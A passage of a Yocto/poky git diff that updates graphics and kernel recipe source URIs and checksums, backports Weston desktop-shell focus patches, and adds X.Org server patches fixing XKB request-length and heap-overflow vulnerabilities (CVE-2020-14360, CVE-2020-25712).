"-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut," PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}" +PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader" +export PIGLIT_BUILD_DIR = "../../../../git" do_configure_prepend() { if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then diff --git a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb index 1046b8504f..772db5bbaf 100644 --- a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb +++ b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10" DEPENDS = "libdrm mesa libepoxy" SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985" -SRC_URI = "git://anongit.freedesktop.org/virglrenderer \ +SRC_URI = "git://anongit.freedesktop.org/virglrenderer;branch=master \ file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \ file://0001-meson.build-use-python3-directly-for-python.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb index 5a8c62e64d..295ac12fc5 100644 --- a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb +++ b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271" DEPENDS = "zlib" -SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \ +SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release;protocol=https \ file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \ file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb index c94e768b52..b212814759 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb @@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \ SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf" SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd" -SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \ - git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \ - git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \ +SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \ + git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \ + git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \ file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \ " UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb index b9658d3afa..c58a801e03 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https" SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb index 504cf85a2b..c8352bf31d 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https" SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb index 8eef1bca73..ec65f11952 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb @@ -6,7 +6,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https" SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb index 14d6a61525..f0dc780ca1 100644 --- a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb +++ b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb @@ -3,17 +3,19 @@ DESCRIPTION = "A cross-platform C library that allows one to defer selection \ of an OpenGL API and window system until runtime. For example, on Linux, Waffle \ enables an application to select X11/EGL with an OpenGL 3.3 core profile, \ Wayland with OpenGL ES2, and other window system / API combinations." -HOMEPAGE = "http://www.waffle-gl.org/" +HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle" BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \ file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf" -SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz" -SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7" -SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7" +SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2" +SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942" +SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb" -UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html" +S = "${WORKDIR}/${BPN}-v${PV}" + +UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases" inherit meson features_check lib_package bash-completion diff --git a/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch new file mode 100644 index 0000000000..fb36d3817a --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch @@ -0,0 +1,32 @@ +From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001 +From: Marius Vlad +Date: Fri, 5 Mar 2021 20:03:49 +0200 +Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg + top-level surface + +The shsurf is calloc'ed so the surface count is always 0. Not only +that but the surface is not set as active by default, so there's no +need to de-activate it. + +Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f] +Signed-off-by: Marius Vlad +--- + desktop-shell/shell.c | 2 -- + 1 file changed, 2 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 442a625f..3791be25 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface, + wl_list_init(&shsurf->children_link); + + weston_desktop_surface_set_user_data(desktop_surface, shsurf); +- weston_desktop_surface_set_activated(desktop_surface, +- shsurf->focus_count > 0); + } + + static void +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch new file mode 100644 index 0000000000..dcd0700fca --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch @@ -0,0 +1,57 @@ +From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001 +From: Marius Vlad +Date: Fri, 5 Mar 2021 21:40:22 +0200 +Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to + activate/de-activate + +This way it better reflects that it handles activation rather that input +focus. + +Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208] +Signed-off-by: Marius Vlad +--- + desktop-shell/shell.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 3791be25..c4669f11 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data) + } + + static void +-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_deactivate(struct shell_surface *shsurf) + { + if (--shsurf->focus_count == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, false); + } + + static void +-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_activate(struct shell_surface *shsurf) + { + if (shsurf->focus_count++ == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, true); +@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_lose_keyboard_focus(shsurf); ++ shell_surface_deactivate(shsurf); + } + + seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_gain_keyboard_focus(shsurf); ++ shell_surface_activate(shsurf); + } + } + +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch new file mode 100644 index 0000000000..7ca72f8494 --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch @@ -0,0 +1,99 @@ +From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001 +From: Marius Vlad +Date: Fri, 5 Mar 2021 21:44:26 +0200 +Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when + activating + +We shouldn't be constrained by having a keyboard plugged-in, so avoid +activating/de-activating the window/surface in the keyboard focus +handler and embed it straight into the window activation part. + +Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69] +Signed-off-by: Marius Vlad +--- + desktop-shell/shell.c | 41 +++++++++++++++++++++++++---------------- + 1 file changed, 25 insertions(+), 16 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index c4669f11..c6a4fe91 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf) + static void + handle_keyboard_focus(struct wl_listener *listener, void *data) + { +- struct weston_keyboard *keyboard = data; +- struct shell_seat *seat = get_shell_seat(keyboard->seat); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_deactivate(shsurf); +- } +- +- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_activate(shsurf); +- } ++ /* FIXME: To be removed later. */ + } + + /* The surface will be inserted into the list immediately after the link +@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + struct shell_surface *shsurf_child, *tmp; + struct weston_surface *surface = + weston_desktop_surface_get_surface(desktop_surface); ++ struct weston_seat *seat; + + if (!shsurf) + return; +@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + } + wl_list_remove(&shsurf->children_link); + ++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) { ++ struct shell_seat *shseat = get_shell_seat(seat); ++ /* activate() controls the focused surface activation and ++ * removal of a surface requires invalidating the ++ * focused_surface to avoid activate() use a stale (and just ++ * removed) surface when attempting to de-activate it. It will ++ * also update the focused_surface once it has a chance to run. ++ */ ++ if (surface == shseat->focused_surface) ++ shseat->focused_surface = NULL; ++ } ++ + wl_signal_emit(&shsurf->destroy_signal, shsurf); + + if (shsurf->fullscreen.black_view) +@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view, + struct workspace *ws; + struct weston_surface *old_es; + struct shell_surface *shsurf, *shsurf_child; ++ struct shell_seat *shseat = get_shell_seat(seat); + + main_surface = weston_surface_get_main_surface(es); + shsurf = get_shell_surface(main_surface); +@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view, + + weston_view_activate(view, seat, flags); + ++ if (shseat->focused_surface) { ++ struct shell_surface *current_focus = ++ get_shell_surface(shseat->focused_surface); ++ assert(current_focus); ++ shell_surface_deactivate(current_focus); ++ } ++ ++ shseat->focused_surface = main_surface; ++ shell_surface_activate(shsurf); ++ + state = ensure_focus_state(shell, seat); + if (state == NULL) + return; +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb index 0b383f25f3..5e4e2032c9 100644 --- a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb +++ b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb @@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \ file://weston.desktop \ file://xwayland.weston-start \ file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \ + file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \ + file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \ + file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \ " SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3" SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848" diff --git a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb index d2a16643fe..e524b82dd6 100644 --- a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb +++ b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb @@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check REQUIRED_DISTRO_FEATURES = "x11" SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46" -SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \ +SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \ file://30xinput_calibrate.sh \ file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \ file://0001-calibrator.hh-Include-string-to-get-std-string.patch \ diff --git a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb index 553840ddb8..685362ef15 100644 --- a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb +++ b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb @@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf" PV = "2.99.917+git${SRCPV}" S = "${WORKDIR}/git" -SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel" +SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P\d+(\.\d+)+)" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc index b4f0760176..c891211c40 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc @@ -18,7 +18,15 @@ INC_PR = "r8" XORG_PN = "xorg-server" SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2" -CVE_PRODUCT = "xorg-server" +CVE_PRODUCT = "xorg-server x_server" +# This is specific to Debian's xserver-wrapper.c +CVE_CHECK_WHITELIST += "CVE-2011-4613" +# As per upstream, exploiting this flaw is non-trivial and it requires exact +# timing on the behalf of the attacker. Many graphical applications exit if their +# connection to the X server is lost, so a typical desktop session is either +# impossible or difficult to exploit. There is currently no upstream patch +# available for this flaw. +CVE_CHECK_WHITELIST += "CVE-2020-25697" S = "${WORKDIR}/${XORG_PN}-${PV}" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch new file mode 100644 index 0000000000..e9ab42742e --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch @@ -0,0 +1,132 @@ +From 446ff2d3177087b8173fa779fa5b77a2a128988b Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb +Date: Thu, 12 Nov 2020 19:15:07 +0100 +Subject: [PATCH] Check SetMap request length carefully. + +Avoid out of bounds memory accesses on too short request. + +ZDI-CAN 11572 / CVE-2020-14360 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/446ff2d3177087b8173fa779fa5b77a2a128988b +CVE: CVE-2020-14360 +Signed-off-by: Armin Kuster +--- + xkb/xkb.c | 92 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ + 1 file changed, 92 insertions(+) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -2382,6 +2382,93 @@ SetVirtualModMap(XkbSrvInfoPtr xkbi, + return (char *) wire; + } + ++#define _add_check_len(new) \ ++ if (len > UINT32_MAX - (new) || len > req_len - (new)) goto bad; \ ++ else len += new ++ ++/** ++ * Check the length of the SetMap request ++ */ ++static int ++_XkbSetMapCheckLength(xkbSetMapReq *req) ++{ ++ size_t len = sz_xkbSetMapReq, req_len = req->length << 2; ++ xkbKeyTypeWireDesc *keytype; ++ xkbSymMapWireDesc *symmap; ++ BOOL preserve; ++ int i, map_count, nSyms; ++ ++ if (req_len < len) ++ goto bad; ++ /* types */ ++ if (req->present & XkbKeyTypesMask) { ++ keytype = (xkbKeyTypeWireDesc *)(req + 1); ++ for (i = 0; i < req->nTypes; i++) { ++ _add_check_len(XkbPaddedSize(sz_xkbKeyTypeWireDesc)); ++ if (req->flags & XkbSetMapResizeTypes) { ++ _add_check_len(keytype->nMapEntries ++ * sz_xkbKTSetMapEntryWireDesc); ++ preserve = keytype->preserve; ++ map_count = keytype->nMapEntries; ++ if (preserve) { ++ _add_check_len(map_count * sz_xkbModsWireDesc); ++ } ++ keytype += 1; ++ keytype = (xkbKeyTypeWireDesc *) ++ ((xkbKTSetMapEntryWireDesc *)keytype + map_count); ++ if (preserve) ++ keytype = (xkbKeyTypeWireDesc *) ++ ((xkbModsWireDesc *)keytype + map_count); ++ } ++ } ++ } ++ /* syms */ ++ if (req->present & XkbKeySymsMask) { ++ symmap = (xkbSymMapWireDesc *)((char *)req + len); ++ for (i = 0; i < req->nKeySyms; i++) { ++ _add_check_len(sz_xkbSymMapWireDesc); ++ nSyms = symmap->nSyms; ++ _add_check_len(nSyms*sizeof(CARD32)); ++ symmap += 1; ++ symmap = (xkbSymMapWireDesc *)((CARD32 *)symmap + nSyms); ++ } ++ } ++ /* actions */ ++ if (req->present & XkbKeyActionsMask) { ++ _add_check_len(req->totalActs * sz_xkbActionWireDesc ++ + XkbPaddedSize(req->nKeyActs)); ++ } ++ /* behaviours */ ++ if (req->present & XkbKeyBehaviorsMask) { ++ _add_check_len(req->totalKeyBehaviors * sz_xkbBehaviorWireDesc); ++ } ++ /* vmods */ ++ if (req->present & XkbVirtualModsMask) { ++ _add_check_len(XkbPaddedSize(Ones(req->virtualMods))); ++ } ++ /* explicit */ ++ if (req->present & XkbExplicitComponentsMask) { ++ /* two bytes per non-zero explicit componen */ ++ _add_check_len(XkbPaddedSize(req->totalKeyExplicit * sizeof(CARD16))); ++ } ++ /* modmap */ ++ if (req->present & XkbModifierMapMask) { ++ /* two bytes per non-zero modmap component */ ++ _add_check_len(XkbPaddedSize(req->totalModMapKeys * sizeof(CARD16))); ++ } ++ /* vmodmap */ ++ if (req->present & XkbVirtualModMapMask) { ++ _add_check_len(req->totalVModMapKeys * sz_xkbVModMapWireDesc); ++ } ++ if (len == req_len) ++ return Success; ++bad: ++ ErrorF("[xkb] BOGUS LENGTH in SetMap: expected %ld got %ld\n", ++ len, req_len); ++ return BadLength; ++} ++ ++ + /** + * Check if the given request can be applied to the given device but don't + * actually do anything.. +@@ -2639,6 +2726,11 @@ ProcXkbSetMap(ClientPtr client) + CHK_KBD_DEVICE(dev, stuff->deviceSpec, client, DixManageAccess); + CHK_MASK_LEGAL(0x01, stuff->present, XkbAllMapComponentsMask); + ++ /* first verify the request length carefully */ ++ rc = _XkbSetMapCheckLength(stuff); ++ if (rc != Success) ++ return rc; ++ + tmp = (char *) &stuff[1]; + + /* Check if we can to the SetMap on the requested device. If this diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch new file mode 100644 index 0000000000..f39f6b32b1 --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-25712.patch @@ -0,0 +1,102 @@ +From 87c64fc5b0db9f62f4e361444f4b60501ebf67b9 Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb +Date: Sun, 11 Oct 2020 17:05:09 +0200 +Subject: [PATCH] Fix XkbSetDeviceInfo() and SetDeviceIndicators() heap + overflows + +ZDI-CAN 11389 / CVE-2020-25712 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/87c64fc5b0db9f62f4e361444f4b60501ebf67b9 +CVE: CVE-2020-25712 +Signed-off-by: Armin Kuster + +--- + xkb/xkb.c | 26 +++++++++++++++++++++++--- + 1 file changed, 23 insertions(+), 3 deletions(-) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -6625,7 +6625,9 @@ SetDeviceIndicators(char *wire, + unsigned changed, + int num, + int *status_rtrn, +- ClientPtr client, xkbExtensionDeviceNotify * ev) ++ ClientPtr client, ++ xkbExtensionDeviceNotify * ev, ++ xkbSetDeviceInfoReq * stuff) + { + xkbDeviceLedsWireDesc *ledWire; + int i; +@@ -6646,6 +6648,11 @@ SetDeviceIndicators(char *wire, + xkbIndicatorMapWireDesc *mapWire; + XkbSrvLedInfoPtr sli; + ++ if (!_XkbCheckRequestBounds(client, stuff, ledWire, ledWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) ledWire; ++ } ++ + namec = mapc = statec = 0; + sli = XkbFindSrvLedInfo(dev, ledWire->ledClass, ledWire->ledID, + XkbXI_IndicatorMapsMask); +@@ -6664,6 +6671,10 @@ SetDeviceIndicators(char *wire, + memset((char *) sli->names, 0, XkbNumIndicators * sizeof(Atom)); + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->namesPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, atomWire, atomWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) atomWire; ++ } + sli->names[n] = (Atom) *atomWire; + if (sli->names[n] == None) + ledWire->namesPresent &= ~bit; +@@ -6681,6 +6692,10 @@ SetDeviceIndicators(char *wire, + if (ledWire->mapsPresent) { + for (n = 0, bit = 1; n < XkbNumIndicators; n++, bit <<= 1) { + if (ledWire->mapsPresent & bit) { ++ if (!_XkbCheckRequestBounds(client, stuff, mapWire, mapWire + 1)) { ++ *status_rtrn = BadLength; ++ return (char *) mapWire; ++ } + sli->maps[n].flags = mapWire->flags; + sli->maps[n].which_groups = mapWire->whichGroups; + sli->maps[n].groups = mapWire->groups; +@@ -6760,7 +6775,7 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + ed.deviceID = dev->id; + wire = (char *) &stuff[1]; + if (stuff->change & XkbXI_ButtonActionsMask) { +- int nBtns, sz, i; ++ int nBtns, sz, i; + XkbAction *acts; + DeviceIntPtr kbd; + +@@ -6772,7 +6787,11 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + return BadAlloc; + dev->button->xkb_acts = acts; + } ++ if (stuff->firstBtn + stuff->nBtns > nBtns) ++ return BadValue; + sz = stuff->nBtns * SIZEOF(xkbActionWireDesc); ++ if (!_XkbCheckRequestBounds(client, stuff, wire, (char *) wire + sz)) ++ return BadLength; + memcpy((char *) &acts[stuff->firstBtn], (char *) wire, sz); + wire += sz; + ed.reason |= XkbXI_ButtonActionsMask; +@@ -6793,7 +6812,8 @@ _XkbSetDeviceInfoCheck(ClientPtr client, + int status = Success; + + wire = SetDeviceIndicators(wire, dev, stuff->change, +- stuff->nDeviceLedFBs, &status, client, &ed); ++ stuff->nDeviceLedFBs, &status, client, &ed, ++ stuff); + if (status != Success) + return status; + } diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb index 2af1b6f307..8c77c3756b 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb @@ -10,6 +10,8 @@ SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.pat file://CVE-2020-14361.patch \ file://CVE-2020-14362.patch \ file://CVE-2020-14345.patch \ + file://CVE-2020-14360.patch \ + file://CVE-2020-25712.patch \ " SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839" SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146" diff --git a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb index 7ccc022b93..2110bc75fa 100644 --- a/poky/meta/recipes-kernel/blktrace/blktrace_git.bb +++ b/poky/meta/recipes-kernel/blktrace/blktrace_git.bb @@ -14,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e" PV = "1.2.0+git${SRCPV}" -SRC_URI = "git://git.kernel.dk/blktrace.git \ +SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \ file://ldflags.patch \ file://CVE-2018-10689.patch \ file://make-btt-scripts-python3-ready.patch \ diff --git a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc index cf9b9b7207..f02619cabe 100644 --- a/poky/meta/recipes-kernel/cryptodev/cryptodev.inc +++ b/poky/meta/recipes-kernel/cryptodev/cryptodev.inc @@ -8,7 +8,7 @@ API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \ +SRC_URI = 